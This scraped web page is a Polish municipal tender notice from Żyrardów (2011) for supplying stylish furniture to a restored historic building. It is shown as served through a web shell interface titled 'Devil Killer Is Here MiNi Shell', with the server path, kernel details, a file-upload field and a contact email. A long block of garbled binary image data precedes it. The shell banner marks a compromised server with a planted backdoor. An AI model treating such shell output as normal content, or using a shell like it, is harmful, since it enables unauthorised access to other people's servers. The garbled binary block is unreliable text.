JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110531/136340-N-2011.html

<p class="kh_header"><b>Żyrardów: Dostawa wraz z montażem mebli stylowych  stanowiących wyposażenie zabytkowego budynku resursy realizowanego w ramach projektu RPO i umowy RPMA.06.01.00-14-048/08-00.</b><br>
<b>Numer ogłoszenia: 136340 - 2011; data zamieszczenia: 31.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Żyrardów , Plac Jana Pawła II 1, 96-300 Żyrardów, woj. mazowieckie, tel. 046 8581567, faks 046 8553782.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zyrardow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem mebli stylowych  stanowiących wyposażenie zabytkowego budynku resursy realizowanego w ramach projektu RPO i umowy RPMA.06.01.00-14-048/08-00..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Fotel  68x60cm wys. 106cm, wys. siedziska 43cm- poz. 1 wg rysunku 01 w pomieszczeniu P-2.2. (oraz P-1; P-9) szt 6;
Stolik 70x70 cm wys. 50cm  - poz. 2 wg rys. 01 w pomieszczeniu P-2.2. (oraz P-1; P-9)	szt 3;
Biurko 140x80x75 cm - poz. 3 wg rys. 01 w pomieszczeniu P-2.3. (oraz P-10; P-11) szt 4;
Fotel obrotowy w stylu dyrektoriańskim 60x55 cm wys. 100 cm - poz. 4 wg rys. 01 w pomieszczeniu  P-2.3. (oraz P-8; P-9; P-10; P-11) szt 6;
Stół kawowy okrągły - śr. 90 cm, wys. 75 cm - poz. 5 wg rys. 01 w pomieszczeniu P-2.3.	szt 1;
Komoda drewniana bez szuflad z dwoma drzwiczkami 100x45x90cm - poz.6 wg rys. 01 w pomieszczeniu P-2.3. (oraz P-10; P-11)	szt 4;
Kanapa 3 osobowa 177x70cm wys. 106cm, wys. siedziska 43 cm - poz. 1 wg rys. 02 w pomieszczeniu P-1	szt 2;
Kanapa 2 osobowa 126x70cm wys. 106cm, wys. siedziska 43 cm - poz. 2 wg rys. 02 w pomieszczeniu P-1 (oraz P-8) szt 5;
Ławeczka do siedzenia -130x56cm wys. 45cm - poz. 4 wg rysunku 02 w pomieszczeniu P-1	szt 2;
Stolik kawowy 120x60cm wys. 50 cm - poz. 5 wg rys.02 w pomieszczeniu P-1	 szt 2;
Krzesło bez podłokietników 48x55cm wys. 101cm, wys. siedziska 50cm - poz. 1 wg rys. 03 w pomieszczeniu P-16.2; P-16.2;-P-29	szt 160;
Krzesło z podłokietnikami 48x55cm wys. 101cm, wys. 50cm - poz. 2 wg rys. 03 w pomieszczeniu P-16.2; P-16.2;-P-29	szt 64;
Stolik okrągły śr. 90 cm wys. 75 cm - poz. 5 wg rys. 03 w pomieszczeniu P-16.1 szt 16;
Stolik okrągły śr. 110cm wys. 75cm - poz. 5 wg rys. 03 w pomieszczeniu P-16.1	szt 14;
Krzesło barowe - hoker    55x48cm wys. 119cm, wys. siedziska 80cm - poz. 5 wg rys. 03 w pomieszczeniu P-16; w piwnicy
	szt 8;
Wieszak stylowy na ubrania h=165cm - poz. 6 wg rys. 03 w pomieszczeniu P-16.1; P-16.2; P-29	szt 8;
Biurko 140x80x75cm - poz. 1 wg rys. 05 w pomieszczeniu P-8	szt 1;
Lustro styl Chippendale 110x45x215cm - poz. 3 wg rys. 05 w pomieszczeniu P-8	szt 1;
Biblioteczka  250x51x225cm - poz. 4 wg rys. 05 w pomieszczeniu P-8	szt 1;
Zestaw konferencyjny Stół+6 szt. krzeseł - poz. 5 wg rys. 05 w pomieszczeniu P-8	szt 1;
Stolik kawowy  śr. 90cm, wys. 50cm - poz. 7 wg rys. 05 w pomieszczeniu P-8	 szt 1;
Stół 200x90x76cm - poz. 1 wg rysunku 16 w pomieszczeniu P-30	szt 20;
Stół 90x90cm wys. 76cm - poz. 2 wg rys. 16 w pomieszczeniu P-30	szt 14;
Krzesło konferencyjne 48x45x87cm szt 64;
Lada recepcyjna - poz. 5 wg rys. 06 oraz rys. 07 w pomieszczeniu Centrum Informacji Turystycznej P-9 	szt 1;
Witryna na towary sprzedażowe -poz. 6 wg rys. 06 i 08 w pomieszczeniu Centrum Informacji Turystycznej P-9	szt 1;
Stanowisko komputerowe - poz. 7 wg rys. 06 i 08 w pomieszczeniu Centrum Informacji Turystycznej P-9	szt 1;
Stolik 70x70x75cm - poz. 1 wg rys. 12 w piwnicy	szt 12;
Krzesło 45x48x100cm - poz. 2 wg rys. 12 w piwnicy	szt 36;
Siedzisko CELEA 40x40x10cm	szt 8;
Stolik do brydża 88x88x76cm	szt 10;
Łóżko stylowe 1-osobowe z materacem 900x2000-2100x450mm - poz. 1 wg rys. nr 14/01	szt 21;
Sofa stylowa 1-osobowa 730x600x900mm - poz. 2 wg rys. 14/01	szt 18;
Stolik okrągły śr 700mm wys. 650mm - poz. 3 wg rys. 14/01 szt	12;
Sofa-kanapa rozkładana 2150x750x950mm - poz. 4 wg rys. 14/01	szt 4;
Stolik nocny 450x390x600mm - poz. 5 wg rys. 14/01	szt 21;
Toaletka stylowa z lustrem kryształowym 950x450x1100mm - poz. 6 wg rys. 14/02	szt 13;
Taboret-ławka 50x35xh45cm - poz. 7 wg. rys. 14/02	szt 12;
Komoda TV+ minibar- lodówka (jeden mebel) 1200x600x750mm - poz. 8 wg rys. 14/02	szt 12;
Szafa stylowa  dwu drzwiowa pełna 1000x650x2150mm - poz. 9 wg rys. 14/02 szt 12;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówienia uzupełniającego wykonawcy, którego oferta zostanie wybrana do realizacji zamówienia objętego niniejszą SIWZ w okresie 3 lat od udzielenia zamówienia podstawowego, (zgodnie z art. 67 ust. 1 pkt.6 i 7 ustawy Prawo zamówień publicznych). Wielość zamówień uzupełniających przewiduje się w wysokości 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 15000 zł słownie piętnaście tysięcy zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonych przez wykonawcę dokumentów i oświadczeń, ocena warunku zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich 3 lat przed terminem składania ofert , jeżeli okres działalności krótszy to w tym okresie - wykonali należycie co najmniej 3 dostawy polegające na dostawie mebli stylowych, każda o wartości nie mniejszej niż 100 000 zł brutto, ocena warunku zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, ocena warunku zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	projekt (szczegółowe rysunki, uwzględniające wszystkie detale konstrukcyjne i zdobnicze) wyposażenia wnętrz pomieszczeń budynku resursy,
2.	zaproponowany fragment wykończenia blatu stołu,
3.	krzesło bez podłokietników - wzór według opisu przedmiotu zamówienia (pkt 3 SIWZ), tapicerka dowolna wraz z wzornikiem tkanin,
4.	kapitela /element zdobniczy (surowy oraz wykończony),
5.	profil zwieńczenia witryn.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość wykonania;(w tym kryterium oceniana bedzie funkcjonalność -znaczenie 15% i estetyka wykonania - znaczenie 15% ) - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 Ustawy Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach:
a)	zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych,
b)	konieczności zamiany w przedmiocie zamówienia, o ile ta nie powoduje zmiany wynagrodzenia Wykonawcy,
c)	zmiany terminu realizacji zamówienia określonego w pkt 4 SIWZ w przypadku gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego,
d)	w przypadku zmiany unormowań prawnych powszechnie obowiązujących,
e)	zmiany w przypadku zaistnienia sytuacji, której nie dało się przewidzieć a jest ona korzystna lub obojętna z punktu widzenia Zamawiającego,
f)	zmiany innych postanowień umowy związanych z postępem Projektu, o ile zmiany te nie są niekorzystne dla Zamawiającego, każdorazowo adekwatnie do zmian wynikających z założeń Projektu.
2.  W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonywania części umowy.
3. Zamawiający zastrzega sobie prawo do zmiany wyglądu wykończenia mebli.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zyrardow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na stronie internetowej zamawiającego oraz w Wydziale Rozwoju Miasta i Inwestycji Urzędu Miasta Żyrardowa, ul. Plac Jana Pawła II nr 1, 96-300 Żyrardów,  pokój 31 - 2 piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2011 godzina 09:30, miejsce: Oferty należy składać w siedzibie Zamawiającego: Wydział Rozwoju Miasta i Inwestycji Urzędu Miasta Żyrardowa, ul. Plac Jana Pawła II nr 1, 96-300 Żyrardów,  pokój 31 - 2 piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonanie przedmiotu umowy realizowane jest w ramach projektu Rewaloryzacja zabytkowych obiektów resursy i kręgielni w Żyrardowie oraz ich adaptacja na cele kulturalno-artystyczne współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego (priorytet VI-06.00.00 - Wykorzystanie walorów naturalnych i kulturalnych dla rozwoju turystyki i rekreacji, działanie 6.1.-06.01.00 - Kultura)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com